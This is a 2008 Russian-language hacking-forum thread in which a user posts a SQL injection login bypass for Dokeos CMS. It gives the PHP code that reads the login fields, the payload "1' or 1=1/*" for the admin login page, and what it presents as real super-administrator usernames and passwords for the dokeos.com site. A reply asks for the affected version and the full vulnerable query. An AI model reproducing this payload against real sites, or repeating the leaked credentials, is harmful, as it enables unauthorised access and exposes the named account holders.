Dokeos CMS

Discussion in 'Веб-уязвимости' started by Roba, 4 Jul 2008.

  1. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Dokeos CMS

    Warning: magic_quotes_gpc = off
    --------------------------------------
    Site: dokeos.com [PR=6]
    Status: Free
    --------------------------------------
    Vuln:
    /claro_init_local.inc.php
    PHP:
     ............
       if(isset(
    $_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in
        
    {
            
    $login $_POST['login'];
            
    $password $_POST['password'];
     .............
    --------------------------------------
    Exploit:
    /admin/login.php
    PHP:
    Your login 1' or 1=1/*    
     Your password : x3kpass
    --------------------------------------
    Super Administrators:
    Code:
    yannick:adminPassword
     thomas:upsi24lon
     jwarnier:cisco123
    ZAMUT (c)
     
    #1 Roba, 4 Jul 2008
    Last edited: 4 Jul 2008
    2 people like this.
  2. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Подверженная версия, дорк и уязвимый запрос пожалста (ты указал только объявление переменных, но не показал где и как они попадают в запрос).